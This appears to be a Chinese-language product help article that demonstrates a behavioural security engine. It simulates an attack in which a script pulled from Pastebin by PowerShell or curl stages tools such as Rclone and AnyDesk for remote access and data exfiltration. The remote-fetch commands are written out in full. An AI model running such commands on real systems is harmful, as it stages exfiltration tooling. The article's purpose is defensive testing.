动态防御是一个行为型安全性引擎,它在检测到威胁时主动应用动态控制来减少攻击面并早期缓解威胁,防止任何影响发生。 有关更多信息,请参阅内容是动态防御?
本文模拟一个真实世界攻击场景,以展示动态防御如何保护您的网络。 在此示例中,用户从Pastebin下载了一个脚本,攻击者尝试使用该脚本来检索执行未来攻击所需的其他高风险工具。 动态防御识别恶意行为并阻止工具下载,在攻击发展或造成任何影响之前进行防御。
对此攻击的响应是完全自动化的。 无需额外的规则。 简单启用动态防御即可阻止攻击。
模拟此攻击:
- 下载高风险工具而不被阻止
- 从Pastebin下载脚本
- 尝试再次下载高风险工具。 此时,下载被阻止。
为了展示动态防御仅在其属于恶意序列时阻止操作,首先下载Rclone,一个用于管理文件的开源命令行工具。 攻击者通常将Rclone用作后妥协工具,因为它是合法的、强大的,并且与正常管理活动融为一体。
从以下位置下载Rclone:
- 以下网址:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
在Windows设备上:
- 以下PowerShell命令:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- 以下PowerShell命令:
-
在macOS/Linux设备上:
- 以下终端命令:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- 以下终端命令:
为了模拟攻击的开始,从Pastebin下载一个脚本,该脚本运行后下载常见的攻击者工具,例如用于远程访问和数据泄露的Rclone和AnyDesk。
从Pastebin下载并运行脚本:
-
在Windows设备上:
- 以下PowerShell命令:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- 以下PowerShell命令:
-
在macOS/Linux设备上:
- 以下终端命令:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- 以下终端命令:
在模拟攻击中,攻击者试图下载Rclone。 然而,由于此操作是下载Pastebin脚本的可疑活动之后进行的,并且已应用控制,动态防御阻止了Rclone下载。
从以下位置下载Rclone:
- 以下网址:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
在Windows设备上:
- 以下PowerShell命令:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- 以下PowerShell命令:
-
在macOS/Linux设备上:
- 以下终端命令:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- 以下终端命令:
0 条评论
文章评论已关闭。